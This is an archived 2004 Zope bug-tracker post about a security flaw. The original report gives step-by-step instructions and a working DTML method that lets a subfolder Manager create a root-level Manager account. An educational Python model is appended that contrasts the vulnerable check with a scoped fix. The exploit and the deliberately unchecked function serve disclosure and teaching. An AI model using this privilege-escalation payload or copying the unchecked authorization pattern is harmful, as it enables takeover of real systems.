[ZCM] [ZC] 977/ 4 Resolve "Manager in lower folder can create manager in higher folder"
Collector: Zope Bugs, Features, and Patches ...
zope-coders-admin at zope.org
Tue Jan 20 09:21:07 EST 2004
Issue #977 Update (Resolve) "Manager in lower folder can create manager in higher folder"
** Security Related ** (Public)
Status Resolved, Zope/bug critical
To followup, visit:
http://zope.org/Collectors/Zope/977
==============================================================
= Resolve - Entry #4 by Brian on Jan 20, 2004 9:21 am
Status: Pending => Resolved
resolved in 2.6.4 / 2.7.0 rc1
-BL
________________________________________
= Resubmit - Entry #3 by mj on Dec 3, 2003 4:40 pm
Status: Rejected => Pending
Damn, this should still be kept confidential. And an email just went out. Resubmitting to make it confidential again.
________________________________________
= Reject - Entry #2 by mj on Dec 3, 2003 4:26 pm
Status: Pending => Rejected
This is a dupe of 743, although this bug has a better example of the risks. Closing this one for bug management simplicity.
________________________________________
= Request - Entry #1 by Anonymous User on Jul 17, 2003 8:30 am
Compare Bug 254, but now use dtml:
Basically, a user defined in
/subfolder/acl_users/trusted_user
with manager role, can use a dtml method with proxy roles to create a new user with manager role in the root acl_users folder.
Here's how to do it.
Stage 1: set up the environment.
1: take a fresh Zope 2.6.1
2: log in as the default admin user
3: create a folder in the root folder, called "subfolder". Check the box to create a user-folder in subfolder.
4: Create a user "trusted_user" in /subfolder/acl_users, with the role of Manager.
5: Log out as admin
Stage 2: trusted_user creates a manager in the root acl_users
1: log into /subfolder/manage as trusted_user
2: create a dtml method
3: edit it as follows:
<dtml-var standard_html_header>
<h2><dtml-var document_title></h2>
<dtml-let user="REQUEST['AUTHENTICATED_USER']">
<dtml-call "REQUEST.set( 'name', 'abc')">
<dtml-call "REQUEST.set( 'password', 'abc')">
<dtml-call "REQUEST.set( 'confirm', 'abc')">
<dtml-call "REQUEST.set( 'roles', user.getRoles() )">
<dtml-call "REQUEST.set( 'domains', user.getDomains() )">
<dtml-with "PARENTS[-1]">
<dtml-call "acl_users.manage_users( 'Add', REQUEST )">
</dtml-with>
<p> hacked </p>
</dtml-let>
<dtml-var standard_html_footer>
4: Go to the proxy tab, and give it the Manager proxy role.
5: view the page. It will render Title and "hacked"
6: log out as trusted_user
Stage 3: abusing the new power
1: go to the url /manage. Log in as abc:abc
2: do bad stuff
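A constructed model of the authorization gap described in the report above, added here as an educational example; it is not code from the report or from Zope, and the folder/actor classes, the `contains` scope test and the `add_user_*` functions are hypothetical names. It contrasts a role-only check (which honours a Manager proxy role obtained in /subfolder against the root acl_users) with one that also requires the acting user to be defined at or above the target user folder.

```python
from dataclasses import dataclass, field
from typing import Dict, List
@dataclass
class Folder:
    """Folder with its own user folder (acl_users): user name -> roles."""
    path: str                                   # "/" is the root
    users: Dict[str, List[str]] = field(default_factory=dict)

    def contains(self, other: "Folder") -> bool:
        """True when self is `other` or one of its ancestors."""
        return self.path == "/" or other.path == self.path \
            or other.path.startswith(self.path + "/")

@dataclass
class Actor:
    """Authenticated user: its defining folder plus proxy roles from the
    executing DTML method (hypothetical model, not Zope's API)."""
    name: str
    home: Folder
    proxy_roles: List[str] = field(default_factory=list)

    def has_manager(self) -> bool:
        return "Manager" in self.home.users.get(self.name, []) \
            or "Manager" in self.proxy_roles

def add_user_unchecked(target: Folder, actor: Actor, name: str, roles: List[str]) -> bool:
    """Vulnerable: Manager via a proxy role in /subfolder is honoured at the root."""
    if not actor.has_manager():
        return False
    target.users[name] = list(roles)
    return True

def add_user_scoped(target: Folder, actor: Actor, name: str, roles: List[str]) -> bool:
    """Hardened: the actor must also be defined at or above the target folder."""
    if not actor.has_manager() or not actor.home.contains(target):
        return False
    target.users[name] = list(roles)
    return True

def demo() -> Dict[str, bool]:
    # Constructed scenario mirroring the report: trusted_user lives in
    # /subfolder/acl_users and runs a method carrying the Manager proxy role.
    sub = Folder("/subfolder", {"trusted_user": ["Manager"]})
    trusted = Actor("trusted_user", sub, proxy_roles=["Manager"])
    admin = Actor("admin", Folder("/", {"admin": ["Manager"]}))
    return {
        "unchecked_upward": add_user_unchecked(Folder("/"), trusted, "abc", ["Manager"]),
        "scoped_upward": add_user_scoped(Folder("/"), trusted, "abc", ["Manager"]),
        "scoped_downward": add_user_scoped(sub, admin, "helper", ["Manager"]),
        "scoped_same_folder": add_user_scoped(sub, trusted, "peer", ["Manager"]),
    }
```

The scoped variant still lets the root admin manage /subfolder/acl_users and lets trusted_user manage its own folder; only the upward direction is refused.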
==============================================================